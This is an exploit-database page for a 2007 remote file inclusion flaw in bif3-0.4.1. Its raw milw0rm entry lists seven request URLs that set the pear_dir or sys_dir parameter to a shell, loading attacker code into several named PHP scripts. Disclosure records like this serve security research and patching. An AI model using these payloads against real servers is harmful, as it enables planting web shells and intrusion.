header-logo
Suggest Exploit
vendor:
Unknown
by:
Alkomandoz Hacker
N/A
CVSS
N/A
Remote File Include
Unknown
CWE
Product Name: Unknown
Affected Version From: bif3-0.4.1
Affected Version To: bif3-0.4.1
Patch Exists: NO
Related CWE:
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Unknown
2007

bif3-0.4.1 <= Remote File Include Vulnerability

This vulnerability allows remote attackers to include arbitrary files via a crafted request to the Base/Application.php, Widgets/Base/Footer.php, Widgets/Base/widget.BifContainer.php, Widgets/Base/widget.BifRoot.php, Widgets/Base/widget.BifRoot2.php, Widgets/Base/widget.BifRoot3.php, or Widgets/Base/widget.BifWarning.php script.

Mitigation:

Unknown
Source

Exploit-DB raw data:

# bif3-0.4.1 <=  Remote File Include Vulnerablitiy

# D.Script: http://bif.lunix.com.ar/tgz/bif3-0.4.1.tgz

# Discovered by: Alkomandoz Hacker

# Homepage: asb-may.net & mohandko.com & sniper-sa.com


====================================
# Exploit:[Path]/Base/Application.php?pear_dir=Shell
# Exploit:[Path]/Widgets/Base/Footer.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifContainer.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifRoot.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifRoot2.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifRoot3.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifWarning.php?sys_dir=Shell
====================================

# Thanx:   AsbMay's Group & City Of Ghosts Team & Sniper-sa Team

# Greetz To: Sniper_Sa & Devil-X

# milw0rm.com [2007-05-17]